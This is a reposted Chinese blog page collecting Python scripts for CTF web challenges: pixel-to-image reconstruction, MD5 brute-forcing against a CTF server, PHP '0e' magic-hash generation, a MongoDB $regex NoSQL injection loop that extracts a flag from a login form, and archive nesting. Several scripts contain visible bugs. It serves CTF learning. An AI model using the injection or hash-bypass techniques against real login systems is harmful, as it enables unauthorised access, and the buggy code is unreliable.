碼上快樂

相關內容    簡體    繁體

積累一點ctf需要掌握的常見腳本知識

本文轉載自   查看原文   2016-11-15 21:29   2831    CTF-Web

1.利用像素點還原圖片。

 1 from PIL import Image
 2 import re
 3 if __name__ == '__main__':
 4     x = 887 //將像素點個數進行分解,可以確定圖片的長寬
 5     y = 111
 6     i = 0
 7     j = 0
 8      
 9     c = Image.new("RGB", (x,y))
10     file_object = open('ce.txt') //ce.txt中保存着像素點的坐標
11      
12     for i in range(0,  x): 
13         for j in range(0,  y):
14             line = file_object.next() //每次讀取一個像素點
15             lst = line.split(",") //lst生成一個元組
16             c.putpixel((i, j), (int(lst[0]), int(lst[1]), int(lst[2])))
17      
18     c.show()
19     c.save("c.png")

 

2.py requests方法的利用以及利用正則匹配查找文本暴力破解md5值。

 1 #coding : utf8
 2 import requests
 3 import re
 4 import hashlib
 5 import itertools
 6 s = requests.session()  //建立一個session對話
 7 url = "http://106.75.67.214:2050/?pass=bee7a613a8fa4f2f"
 8 data = {'PHPSESSID':'6h7b4caq8bo41i3m5fg2983cq5'}
 9 content = s.get(url=url,data=data)
10 target = re.findall("sh\"\>(.*)\<",content.text) 
11 target = target[0]
12 poc = re.findall("code\"\>(.*)\<",content.text)
13 str1 = poc[0]
14 a = [''.join(x) for x in itertools.permutations(str1, 9)]  //join方法是通過指定的字符串來連接序列元素從而構成新字符串,permutations用來生成無重復字符的元組
15 for i in range(0,len(a)):
16 final = hashlib.md5(a[i])
17 if final.hexdigest() == target:
18 flag = s.get(url="http://106.75.67.214:2050/?code="+a[i])
19 print flag.content
20 print flag.headers

 3.利用py將base64編碼的字符串還原成圖片

1 import os,base64   
2 strs='''''sdasdas==''' //已經編碼的base64字符串 
3   
4 imgdata=base64.b64decode(strs)  
5 file=open('1.jpg','wb')  
6 file.write(imgdata)  
7 file.close()

 4.生成0e哈希值:

 1 #coding:utf-8
 2 import hashlib
 3 import itertools
 4 def go():
 5     payload = [c for c in "qwertyuioplkjhgfdsazxcvbnm123654789"]
 6     i = 0
 7     print payload
 8     for j in itertools.product(payload,repeat=30): #repeat參數指定長度
 9         payloads = "".join(j)
10         #print pow
11         #i = i+ 1
12         #if i == 10:
13         #    break
14         str1 = hashlib.md5(payloads).hexdigest + "SALT"
15         str2 = hashlib.md5(str1)
16         if (str2[0]=="0") & (str2[1]=="e") & (str2[2:].isdigit()):
17             print payloads
18 go()

5.mongodb基於正則注入:

 1 #coding:utf-8
 2 import requests
 3 import string
 4 # print string.ascii_letters
 5 # print string.digits
 6 flag = "c1ctf{"
 7 payload = string.ascii_letters + string.digits
 8 
 9 url = "http://xx.x.x.x/index.php?"
10 restsrt = True
11 while restsrt:
12     restsrt = False
13     for i in payload:
14         payloads = flag + i
15         post_data = {"username":"admin","passwd[$regex]":flag+".*"}
16         #post_data = {"username":"admin","passwd[$regex]":"^"+flag}
17         r = requests.get(url = url,data = post_data,allow_redirects = False)
18         if r.status_code == "302":
19             print payloads
20             flag = flag + i
21             restsrt =True
22             if i == "}":
23                 exit(0)
24             break
25

6.多次壓縮打包

 1 #coding:utf-8
 2 import tarfile
 3 for i in range(1,2):
 4     tfile = tarfile.open("shell0.tar.gz","w:gz") #打包壓縮
 5     tfile.add("flag.py")
 6     tfile.close()
 7 
 8 for i in range(1,300):
 9     tfile = tarfile.open("shell"+str(i)+".tar.gz","w:gz")
10     tfile.add("1.php")
11     tfile.add("shell"+str(i-1)+".tar.gz")
12     tfile.close()

7.多次解壓:

1 #coding:utf-8
2 import tarfile
3 for i in range(1,300)[::-1]:
4     file = tarfile.open("shell"+str(i)+"tar.gz")
5     file.extractall()
6     file.close()

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 python爬蟲需要掌握哪些知識點 springmvc需要掌握的面試知識 你需要掌握的Scoop技巧和知識 前端需要掌握的Babel知識 前端需要掌握的Nginx知識 8年javascript知識點積累 JavaScript你必須掌握的8大知識點 PHP and laravel知識點小小積累 你需要掌握的有關.NET DateTime類型的知識點和坑位 都在這里 CTF知識點總結(一)
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM